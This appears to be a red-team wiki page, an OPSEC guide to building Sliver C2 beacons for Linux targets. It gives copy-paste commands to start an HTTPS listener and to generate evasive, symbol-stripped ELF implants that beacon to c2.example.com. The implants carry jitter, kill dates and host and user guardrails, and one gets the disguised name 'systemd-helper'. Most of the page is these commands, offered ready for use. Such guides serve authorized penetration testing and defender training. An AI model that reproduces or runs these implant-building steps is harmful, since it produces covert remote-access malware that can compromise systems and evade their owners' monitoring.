Select a result to preview

1.2.2 Sliver Beacon Creation OPSEC

#redteam #c2 #sliver #linux #opsec #beacons

1.2.2 Sliver Beacon Creation β€” OPSEC Guide

BLUF: Sliver beacons should be built deliberately: right transport, right interval, right kill date, right execution limits. The safest pattern is to generate beacons, not long-lived sessions, and to bake in restrictions so payloads fail closed when they land somewhere unexpected.

Note

Sections
πŸš€ Ready-to-Use Setup Β· 1. Beacon First, Session Later Β· 2. Direct Beacon Generation Β· 3. Generate from a Saved Profile Β· 4. Timing, Jitter, and Failure Logic Β· 5. Transport Choices Β· 6. Execution Restrictions Β· 7. Validate Before Staging Β· 8. Common Mistakes Β· 9. Quick-Reference Cheat Sheet

πŸš€ Ready-to-Use Setup (Copy-Paste)

Replace these placeholders first:

Run location: Every https, generate beacon, profiles generate, implants, and regenerate command in this page is run on the backend Sliver server (usually inside the sliver-server console or its shell). Do not run these on the jump server. The jump server only fronts traffic in the redirector infrastructure docs.

Step 1 β€” Start a Listener (backend Sliver server)

# On the backend Sliver server, inside the sliver-server console:
https --lhost 0.0.0.0 --lport 443 --domain c2.example.com
jobs

Step 2 β€” Generate a Linux Beacon Directly (backend Sliver server)

generate beacon \
  --http C2_URL \
  --os linux \
  --arch amd64 \
  --format exe \
  --seconds 3600 \
  --jitter 600 \
  --reconnect 60 \
  --poll-timeout 360 \
  --max-errors 1000 \
  --strategy s \
  --evasion \
  --skip-symbols \
  --limit-datetime KILL_DATE \
  --limit-fileexists /etc/ssh/sshd_config \
  --save OUTDIR

Step 3 β€” Or Generate from a Saved Profile (backend Sliver server)

profiles generate lin-http-prod \
  --name systemd-helper \
  --save OUTDIR

Step 4 β€” Verify the Generated Build Exists (backend Sliver server shell / console)

implants
ls -lah OUTDIR

OPSEC: Generate on infrastructure you control and keep payload build windows short. The less time operators spend compiling and recompiling during live ops, the fewer mistakes and artifacts you accumulate.

MITRE ATT&CK Mapping

Technique ID Name Tactic Where Used
T1071.001 Web Protocols Command & Control HTTP(S) beacon transport
T1573.002 Asymmetric Cryptography Command & Control Sliver encrypted transport
T1105 Ingress Tool Transfer Command & Control Payload staging after generation
T1480 Execution Guardrails Defense Evasion Host/user/file/date restrictions

Section 1 β€” Beacon First, Session Later

For Linux ops, the default should be:

Generate beacon  β†’  deliver beacon  β†’  task beacon  β†’  open interactive session only when needed

Why:

OPSEC: Interactive sessions are for moments that justify the extra noise: interactive troubleshooting, one-off file ops, or tooling that cannot tolerate queued tasking. Default back to beacons.

Section 2 β€” Direct Beacon Generation

generate beacon \
  --http c2.example.com/assets \
  --os linux \
  --arch amd64 \
  --format exe \
  --seconds 3600 \
  --jitter 600 \
  --reconnect 60 \
  --poll-timeout 360 \
  --max-errors 1000 \
  --strategy s \
  --evasion \
  --skip-symbols \
  --limit-datetime 2026-12-31T23:59:59Z \
  --limit-fileexists /etc/ssh/sshd_config \
  --save /tmp/payloads

What each flag really means

Flag Meaning
--http c2.example.com/assets Use HTTP(S) transport; Sliver uses --http for HTTP and HTTPS implants
--format exe Linux executable output (ELF)
--seconds 3600 Beacon every 3600 seconds
--jitter 600 Add 0–600 seconds randomly; jitter is flat seconds
--reconnect 60 Retry unreachable C2 every 60 seconds
--poll-timeout 360 Long-poll timeout in seconds
--max-errors 1000 Stop after too many failed connection attempts
--strategy s Sequential connection strategy

OPSEC: Sliver enforces a minimum beacon interval of 5 seconds, but β€œvalid” is not the same as β€œsmart.” For production ops, think in minutes or hours, not seconds.

Section 3 β€” Generate from a Saved Profile

If you already created a profile in 1.2.1 Sliver Profile Creation OPSEC, generate from that instead of retyping flags:

profiles info lin-http-prod

profiles generate lin-http-prod \
  --name systemd-helper \
  --save /tmp/payloads

Use this when:

Do not use this blindly when:

Section 4 β€” Timing, Jitter, and Failure Logic

Practical timing bands

Use case Suggested interval
Lab / troubleshooting 60–300 seconds
Short internal op 900–1800 seconds
Long dwell / external 3600+ seconds

Important behavior

OPSEC: Low interval + high operator curiosity is how β€œquiet” beacons become noisy. The payload is only half the noise story; the tasking cadence matters just as much.

Section 5 β€” Transport Choices

Transport flag Good for Caveat
--http Redirectors, blend-in web traffic, most common ops Sliver may attempt HTTPS and HTTP under this transport family
--mtls Cleaner dedicated C2 channels Less blend-in than web-facing infra
--dns Fallback / constrained egress Slow and operationally expensive
--wg Controlled environments Usually less natural-looking than web traffic

Important syntax note

Listener command:  https --lhost 0.0.0.0 --lport 443
Implant flag:      generate beacon --http c2.example.com

That is intentional. The listener and implant flag names are not symmetrical.

OPSEC: For redirector-backed infrastructure, --http domain/prefix is usually the safest day-to-day choice. Keep DNS as fallback, not primary, unless the environment strongly favors it.

Section 6 β€” Execution Restrictions

Good restrictions make a payload fail closed:

generate beacon \
  --http c2.example.com/assets \
  --os linux --arch amd64 --format exe \
  --limit-datetime 2026-12-31T23:59:59Z \
  --limit-hostname web-01 \
  --limit-username ubuntu \
  --limit-fileexists /etc/ssh/sshd_config

When to use them

OPSEC: Restrictions reduce accidental execution on the wrong host, but they can also create silent failures if your assumptions are wrong. Verify target reality before making limits too strict.

Section 7 β€” Validate Before Staging

Before handing a beacon to an operator or staging pipeline:

# Review stored builds:
implants

# If needed, rebuild the exact same stored implant:
regenerate --save /tmp/payloads BUILD_NAME

Check:

  1. Correct OS / arch
  2. Correct output format
  3. Correct C2 endpoint
  4. Correct kill date
  5. Correct interval / jitter
graph LR
    A[Start listener] --> B[Generate beacon or use profile]
    B --> C[Review implants / profile info]
    C --> D[Stage or deliver]
    D --> E[Catch callback]

Section 8 β€” Common Mistakes

Mistake Why it hurts Better move
--https in generate beacon Current Sliver uses --http for HTTP(S) implant transport Use --http
--format elf Current format token is exe for Linux executables Use --format exe
Very short intervals Creates obvious beaconing and operator impatience Default to 15m–60m+ unless you have a reason
No kill date Payload may outlive authorization Always set --limit-datetime
Rebuilding by memory each time Flag drift and operator typos Use saved implant profiles

Section 9 β€” Quick-Reference Cheat Sheet

# Start HTTPS listener:
https --lhost 0.0.0.0 --lport 443 --domain c2.example.com

# Direct beacon generation:
generate beacon \
  --http c2.example.com/assets \
  --os linux --arch amd64 --format exe \
  --seconds 3600 --jitter 600 \
  --reconnect 60 --poll-timeout 360 \
  --limit-datetime 2026-12-31T23:59:59Z \
  --save /tmp/payloads

# Build from saved profile:
profiles generate lin-http-prod --name systemd-helper --save /tmp/payloads

# Review builds:
implants

Part of the Red Teaming 101 series. Previous: 1.2.1 Sliver Profile Creation OPSEC Β· Parent: 1.2 Sliver C2 Linux